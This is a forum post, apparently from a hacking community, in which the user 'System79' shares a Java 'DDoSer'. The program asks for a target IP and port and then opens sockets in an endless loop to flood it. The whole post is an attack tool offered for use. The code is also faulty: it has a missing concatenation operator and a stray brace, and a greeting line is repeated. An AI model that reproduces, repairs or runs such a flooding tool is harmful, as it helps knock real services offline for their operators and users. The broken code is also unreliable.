System79s Java DDoSer
Welcome to my thread about my Java DDoSer.
Btw.. anyone who remembers me?
If it gives any compile errors please tell me, did this from my head.
Btw.. anyone who remembers me?
Code:
import java.io.*;
import java.net.*;
import java.util.Scanner;
public class DDoSer {
public String author = "System79";
public String date = "Sun Nov 25";
public static void main(String[] args) throws IOException {
Scanner scanner = new Scanner(System.in);
System.out.println("Please fill in the IP adress to flood:");
String ip = scanner.nextLine();
System.out.println("Please fill in the Port to flood:");
int port = scanner.nextInt();
System.out.println("Starting flood");
try {
while(true) {
new Socket(ip, port);
}
} catch (UnknownHostException e) {
System.err.println("Could not find: "ip);
System.exit(1);
}
}
}
}




